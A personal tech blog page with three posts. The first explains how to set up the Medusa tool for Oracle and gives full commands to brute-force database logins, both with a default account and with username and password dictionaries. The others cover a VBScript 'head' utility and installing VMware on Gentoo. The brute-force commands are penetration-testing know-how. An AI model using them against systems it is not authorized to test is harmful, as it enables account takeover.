TheInterW3bs.com

Just another guy griping on his blog

Brute forcing Oracle with Medusa

Jan 26

Posted by nick in Hacking

While I think Hydra is a great tool, it always seems to be a little flaky to me and I totally agree with the foofus guys that I doubt Hydra is always doing its job. So about a year ago I was testing some Oracle dbs and needed a “working” bruteforcer and came across Medusa. Since using Medusa I have stopped using Hydra because it seems to handle many more protocols and services than Hydra ever actually supported.
The instructions are on the wiki but I thought I would list them out here too.
Download Medusa from foofus.net . Do the standard

./configure --prefix=/stickit/whereever ; make; make install

If running Gentoo you can install the Pentoo Overlay and emerge Medusa that way.
You will also need the following packages. Here are the ebuilds in Gentoo’s portage.

app-admin/eselect-oracle
dev-db/oracle-instantclient-basic
dev-db/oracle-instantclient-sqlplus

Then to prep Medusa for Oracle support you need to get all your annoying environment variables set and install DBD::Oracle

export ORACLE_HOME=/usr/lib/oracle/10.2.0.3/client
export LD_PATH=/usr/lib/oracle/10.2.0.3/client/lib
export C_INCLUDE_PATH=/usr/lib/oracle/10.2.0.3/client/include/
export LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
perl -MCPAN -e shell
install DBD::Oracle

DBD::Oracle installation failed for me so I did the following

cd ~.cpan/build/DBD-Oracle-*
perl Makefile.PL
make install

As of version 1.5 the oracle.pl script needs to be adjusted
…/medusa-1.5/src/modsrc/wrapper/oracle.pl – modify line 50 to be:

my $msg = "", $err = 0;

Then to run Medusa using specific creds, like OUTLN/OUTLN try something like

./medusa -M wrapper -h 192.168.0.1 -u OUTLN -p OUTLN -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

To have it read in a list of user and a dictionary try something like

./medusa -M wrapper -h 192.168.0.1 -U /tmp/ora-users.txt -P /tmp/bigdict.txt -t 3 -r 1 -f -F -O /tmp/medusa-oracle-output -v 6 -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

I have noticed sometimes you need to throttle Medusa a little so the db can properly respond before you throw another attempt at it.

No Comments

Head Command for Windows

Jan 17

Posted by nick in Forensics, Windows

I was looking for a way to do a head in Windows and didn’t want to use any third-party software and of course, it had to be on the commandline.  So like head I needed it to show X number of lines from the beginning.  I don’t know VBScript, so I am sure there is a better/cleaner way to write this but here is what I came up with.  If anyone knows an easier way please pass it on.

If WScript.Arguments.Count = 2 Then
FileName = WScript.Arguments.Item(0)
NumLines = WScript.Arguments.Item(1)
Else
Wscript.Echo "Usage: cscript.exe head.vbs filename NumberOfLines"
Wscript.Quit
End If

Const ForReading = 1

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile(FileName, ForReading)

Dim i
For i = 1 To NumLines
strNextLine = objFile.ReadLine
strLine = strNextLine
Wscript.Echo strLine
Next

objFile.Close
C:\dumps>type test.txt
line 1
line 2
line 3
line 4
line 5
line 6
line 7
line 8
line 9
line 10
line 11
C:\dumps>cscript //nologo head.vbs test.txt 8
line 1
line 2
line 3
line 4
line 5
line 6
line 7
line 8
No Comments

VMware Workstation 7 and Gentoo

Dec 3

Posted by nick in Linux

As of writing this there isn’t an ebuild out for Workstation 7.  There is also a compile issue with Workstation 6.x and 7’s vmnet module using a 2.6.32 kernel.  I upgraded to 7 yesterday and unfortunately dropped VirtualBox.  Don’t get me wrong, I love VBox and have never had any problems with it performance-wise or feature-wise but I use VMware Workstation or Fusion on all my other systems and at work.  I continually found the need to transport vms around and things just didn’t work right when running and saving VMware vms in VBox and then running it back in VMware.

To install Workstation 7 I installed the following apps

dev-cpp/cairomm
dev-cpp/libgnomecanvasmm
dev-cpp/libsexymm
sys-apps/pciutils
sys-fs/fuse
sys-libs/glibc
x11-libs/libview
x11-libs/libgksu
x11-libs/libXcursor
x11-libs/libXft
x11-libs/libXi
x11-libs/libXinerama
x11-libs/libXrandr
dev-util/eclipse-sdk
gnome-base/gnome-desktop
gnome-base/gvfs

If you want to extract the bundle the following command will do it

./VMware-Workstation-Full-7.0.0-203739.x86_64.bundle -x /tmp/vmware-installer

The following creates the needed dir’s for vmware

cd /etc
ln -s init.d rc0.d
ln -s init.d rc1.d
ln -s init.d rc2.d
ln -s init.d rc3.d
ln -s init.d rc4.d
ln -s init.d rc5.d
ln -s init.d rc6.d
ln -s init.d rcS.d

Copy the vmware bundle file to /usr/src.  For some reason telling it to install somewhere else seemed to fail for me.

./VMware-Workstation-Full-7.0.0-203739.x86_64.bundle --console --custom -I

Enter the defaults for pretty much everything except tell it the init scripts are located in /etc/init.d and then everything load.

http://communities.vmware.com/thread/239221 – has information on patching vmware for the 2.6.32 kernel.  Haven’t tried it yet but seems simple enough.

5 Comments